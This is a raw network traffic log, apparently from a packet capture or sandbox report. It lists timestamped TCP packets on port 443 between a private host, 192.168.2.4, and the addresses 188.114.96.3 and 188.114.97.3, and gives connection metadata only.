                                                                  Dec 30, 2024 22:42:42.874588013 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.874630928 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.874650002 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.875088930 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.875113010 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.875154972 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.875159025 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.875189066 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.875189066 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.875351906 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.875372887 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.875408888 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.875416040 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.875438929 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.875453949 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.962595940 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.962618113 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.962651968 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.962657928 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.962692022 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.962696075 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.962719917 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.962727070 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.962740898 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.962745905 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.962774992 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.962984085 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.963010073 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.963044882 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.963049889 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.963063002 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.963145018 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.963167906 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.963208914 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.963213921 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.963242054 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.963264942 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.963371038 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.963392973 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.963423014 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.963427067 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.963445902 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.963466883 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.963746071 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.963764906 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.963804960 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.963809013 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.963833094 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.963844061 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.963937998 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.963958025 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.963996887 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.964004040 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.964018106 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.964040041 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.964307070 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.964327097 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.964354038 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.964359999 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:42.964387894 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:42.964407921 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:43.051388979 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:43.051409960 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:43.051445961 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:43.051451921 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:43.051489115 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:43.051490068 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:43.051507950 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:43.051516056 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:43.051528931 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:43.051537037 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:43.051584005 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:43.051815987 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:43.051835060 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:43.051865101 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:43.051871061 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:43.051883936 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:43.051989079 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:43.052045107 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:43.052063942 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:43.052095890 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:43.052100897 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:43.052125931 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:43.052149057 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:43.052319050 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:43.052340031 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:43.052381039 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:43.052385092 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:43.052412987 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:43.052426100 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:43.052591085 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:43.052638054 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:43.052643061 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:43.052649021 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:43.052689075 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:43.053999901 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:43.054018021 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:43.054085016 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:43.054090023 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:43.054131985 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:43.054296017 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:43.054313898 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:43.054352045 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:43.054357052 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:43.054388046 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:43.054395914 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:43.140259027 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:43.140286922 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:43.140335083 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:43.140347958 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:43.140358925 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:43.140384912 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:43.140389919 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:43.140403986 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:43.140409946 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:43.140429020 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:43.140465975 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:43.140551090 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:43.140569925 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:43.140605927 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:43.140610933 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:43.140636921 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:43.140654087 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:43.140877962 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:43.140898943 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:43.140928984 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:43.140933990 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:43.140960932 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:43.140974045 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:43.141223907 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:43.141244888 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:43.141275883 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:43.141279936 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:43.141323090 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:43.141323090 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:43.141463995 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:43.141483068 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:43.141518116 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:43.141521931 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:43.141551971 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:43.141572952 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:43.141705990 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:43.141726017 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:43.141760111 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:43.141763926 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:43.141788960 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:43.141803980 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:43.142787933 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:43.142807007 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:43.142854929 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:43.142858982 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:43.142889977 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:43.142910957 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:43.155204058 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:43.155267000 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:43.155273914 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:43.199665070 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:43.229921103 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:43.229943037 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:43.230020046 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:43.230026007 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:43.230077028 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:43.230176926 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:43.230196953 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:43.230227947 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:43.230232954 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:43.230267048 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:43.230447054 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:43.230470896 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:43.230482101 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:43.230487108 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:43.230495930 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:43.230534077 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:43.230784893 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:43.230804920 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:43.230839014 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:43.230843067 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:43.230865955 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:43.230885983 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:43.231089115 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:43.231107950 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:43.231141090 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:43.231143951 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:43.231173038 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:43.231189966 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:43.231278896 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:43.231297016 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:43.231332064 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:43.231337070 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:43.231355906 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:43.231379986 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:43.231654882 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:43.231674910 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:43.231708050 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:43.231712103 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:43.231739044 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:43.231754065 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:43.243978024 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:43.243995905 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:43.244059086 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:43.244065046 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:43.244123936 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:43.291711092 CET44358527188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:43.291970015 CET58527443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:43.291987896 CET44358527188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:43.292274952 CET44358527188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:43.292584896 CET58527443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:43.292640924 CET44358527188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:43.292741060 CET58527443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:43.292756081 CET44358527188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:43.318749905 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:43.318770885 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:43.318866014 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:43.318871975 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:43.319000959 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:43.319022894 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:43.319058895 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:43.319062948 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:43.319086075 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:43.319124937 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:43.319243908 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:43.319266081 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:43.319303989 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:43.319308043 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:43.319345951 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:43.319365978 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:43.319581032 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:43.319600105 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:43.319636106 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:43.319639921 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:43.319674015 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:43.319696903 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:43.319791079 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:43.319809914 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:43.319834948 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:43.319839001 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:43.319881916 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:43.320173979 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:43.320194006 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:43.320233107 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:43.320238113 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:43.320264101 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:43.320291042 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:43.320380926 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:43.320406914 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:43.320439100 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:43.320442915 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:43.320455074 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:43.320477962 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:43.320506096 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:43.320512056 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:43.320524931 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:43.320569038 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:43.320949078 CET58509443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:43.320956945 CET44358509188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:43.325124979 CET58529443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:43.325156927 CET44358529188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:43.325232983 CET58529443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:43.325519085 CET58529443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:43.325531960 CET44358529188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:43.327132940 CET58530443192.168.2.4188.114.97.3
                                                                  Dec 30, 2024 22:42:43.327162981 CET44358530188.114.97.3192.168.2.4
                                                                  Dec 30, 2024 22:42:43.327245951 CET58530443192.168.2.4188.114.97.3
                                                                  Dec 30, 2024 22:42:43.327454090 CET58530443192.168.2.4188.114.97.3
                                                                  Dec 30, 2024 22:42:43.327471018 CET44358530188.114.97.3192.168.2.4
                                                                  Dec 30, 2024 22:42:43.332576036 CET44358528188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:43.333549023 CET58528443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:43.333575010 CET44358528188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:43.333853960 CET44358528188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:43.337328911 CET58528443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:43.337387085 CET44358528188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:43.337460041 CET58528443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:43.337471008 CET44358528188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:43.564804077 CET44358523188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:43.564883947 CET44358523188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:43.564960003 CET58523443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:43.566293001 CET58523443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:43.566304922 CET44358523188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:43.799174070 CET44358530188.114.97.3192.168.2.4
                                                                  Dec 30, 2024 22:42:43.799474001 CET58530443192.168.2.4188.114.97.3
                                                                  Dec 30, 2024 22:42:43.799494982 CET44358530188.114.97.3192.168.2.4
                                                                  Dec 30, 2024 22:42:43.800370932 CET44358530188.114.97.3192.168.2.4
                                                                  Dec 30, 2024 22:42:43.800443888 CET58530443192.168.2.4188.114.97.3
                                                                  Dec 30, 2024 22:42:43.800770044 CET58530443192.168.2.4188.114.97.3
                                                                  Dec 30, 2024 22:42:43.800780058 CET58530443192.168.2.4188.114.97.3
                                                                  Dec 30, 2024 22:42:43.800822973 CET44358530188.114.97.3192.168.2.4
                                                                  Dec 30, 2024 22:42:43.800834894 CET58530443192.168.2.4188.114.97.3
                                                                  Dec 30, 2024 22:42:43.800877094 CET58530443192.168.2.4188.114.97.3
                                                                  Dec 30, 2024 22:42:43.801289082 CET58531443192.168.2.4188.114.97.3
                                                                  Dec 30, 2024 22:42:43.801328897 CET44358531188.114.97.3192.168.2.4
                                                                  Dec 30, 2024 22:42:43.801399946 CET58531443192.168.2.4188.114.97.3
                                                                  Dec 30, 2024 22:42:43.801597118 CET58531443192.168.2.4188.114.97.3
                                                                  Dec 30, 2024 22:42:43.801610947 CET44358531188.114.97.3192.168.2.4
                                                                  Dec 30, 2024 22:42:43.801685095 CET44358529188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:43.801861048 CET58529443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:43.801877975 CET44358529188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:43.802386999 CET44358529188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:43.802687883 CET58529443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:43.802762985 CET44358529188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:43.802841902 CET58529443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:43.802851915 CET44358529188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:43.818197966 CET44358525188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:43.818289995 CET44358525188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:43.818339109 CET58525443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:43.819147110 CET58525443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:43.819155931 CET44358525188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:43.896981001 CET44358526188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:43.897064924 CET44358526188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:43.897270918 CET58526443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:43.897993088 CET58526443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:43.898004055 CET44358526188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:44.277045965 CET44358531188.114.97.3192.168.2.4
                                                                  Dec 30, 2024 22:42:44.284364939 CET58531443192.168.2.4188.114.97.3
                                                                  Dec 30, 2024 22:42:44.284389973 CET44358531188.114.97.3192.168.2.4
                                                                  Dec 30, 2024 22:42:44.284698963 CET44358531188.114.97.3192.168.2.4
                                                                  Dec 30, 2024 22:42:44.288768053 CET58531443192.168.2.4188.114.97.3
                                                                  Dec 30, 2024 22:42:44.288829088 CET44358531188.114.97.3192.168.2.4
                                                                  Dec 30, 2024 22:42:44.292407990 CET58531443192.168.2.4188.114.97.3
                                                                  Dec 30, 2024 22:42:44.335364103 CET44358531188.114.97.3192.168.2.4
                                                                  Dec 30, 2024 22:42:44.416614056 CET44358531188.114.97.3192.168.2.4
                                                                  Dec 30, 2024 22:42:44.416716099 CET44358531188.114.97.3192.168.2.4
                                                                  Dec 30, 2024 22:42:44.416753054 CET44358531188.114.97.3192.168.2.4
                                                                  Dec 30, 2024 22:42:44.416785002 CET44358531188.114.97.3192.168.2.4
                                                                  Dec 30, 2024 22:42:44.416811943 CET44358531188.114.97.3192.168.2.4
                                                                  Dec 30, 2024 22:42:44.416872025 CET58531443192.168.2.4188.114.97.3
                                                                  Dec 30, 2024 22:42:44.416872025 CET58531443192.168.2.4188.114.97.3
                                                                  Dec 30, 2024 22:42:44.416886091 CET44358531188.114.97.3192.168.2.4
                                                                  Dec 30, 2024 22:42:44.416929960 CET58531443192.168.2.4188.114.97.3
                                                                  Dec 30, 2024 22:42:44.417098999 CET44358531188.114.97.3192.168.2.4
                                                                  Dec 30, 2024 22:42:44.417148113 CET44358531188.114.97.3192.168.2.4
                                                                  Dec 30, 2024 22:42:44.417191029 CET58531443192.168.2.4188.114.97.3
                                                                  Dec 30, 2024 22:42:44.417196989 CET44358531188.114.97.3192.168.2.4
                                                                  Dec 30, 2024 22:42:44.417222977 CET44358531188.114.97.3192.168.2.4
